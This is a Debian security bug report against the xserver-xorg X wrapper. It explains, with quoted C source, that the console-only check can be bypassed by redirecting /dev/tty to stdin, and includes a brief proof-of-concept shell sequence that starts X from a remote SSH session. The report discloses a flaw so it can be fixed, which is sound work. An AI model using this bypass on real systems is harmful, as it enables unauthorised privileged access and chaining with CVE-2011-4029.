Bug#652249: bypass default security level of the X wrapper
Package: xserver-xorg
Version: 1:7.5+8
Severity: important
Tags: security
By default, the wrapper's configuration file only allows any user whose
controlling TTY (console) to start the X server with root privileges:
# cat /etc/X11/Xwrapper.config
[...]
allowed_users=console
To determine if a user is controlling a TTY, the code checks the
properties of the file connected to its standard input:
$ cat -n debian/local/xserver-wrapper.c
[...]
152 static int
153 onConsole()
154 {
155 #if defined(__linux__)
156 struct stat s;
157
158 /* see if stdin is a virtual console device */
159 if (fstat(0, &s) != 0) {
160 (void) fprintf(stderr, "X: cannot stat stdin\n");
161 return FALSE;
162 }
163 if (S_ISCHR(s.st_mode) &&
164 ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV &&
165 (s.st_rdev & 0xff) < 64) ||
166 (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV &&
167 (s.st_rdev & 0xff) < 64)
168 )) {
169 return TRUE;
170 }
As seen, this is done by checking if this file:
- is a character device [line 163]
- has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV,
respectively 4 or 5) [lines 164, 166]
- has a minor number lower than 64 [lines 165, 167]
Unfortunately, by connecting a file with similar properties to its
stdin, a user can mislead the X wrapper and launch the X server. This
file also needs to be readable by the user.
For instance, files "/dev/tty" and "/dev/ptmx" match those conditions:
$ ls -l /dev/tty /dev/ptmx
crw-rw-rw- 1 root root 5, 2 14 déc. 18:43 /dev/ptmx
crw-rw-rw- 1 root root 5, 0 12 déc. 23:03 /dev/tty
Here is a quick PoC by using "/dev/tty":
$ ssh remote_host
$ id
uid=1000(vladz) gid=1000(vladz) groups=1000(vladz)
$ tty
/dev/pts/4 // not a TTY, won't have sufficient permissions to start X
$ X :1
X: user not authorized to run the X server, aborting.
// This was the expected result, now lets connect "/dev/tty" to stdin and
// retry...
$ exec 0</dev/tty; X :1; exec 0</dev/pts/4
[... Xorg starts ...] // start succeed!
This being said, this is a minor issue, but the attack against
CVE-2011-4029[1] which allows to set the read permission on any arbitrary
file, can now be launched from remote sessions and not even from a TTY. It
become urgent to fix it.
[1] http://security-tracker.debian.org/tracker/CVE-2011-4029
Thanks,
vladz.
--
http://vladz.devzero.fr
PGP key 8F7E2D3C from pgp.mit.edu
Reply to: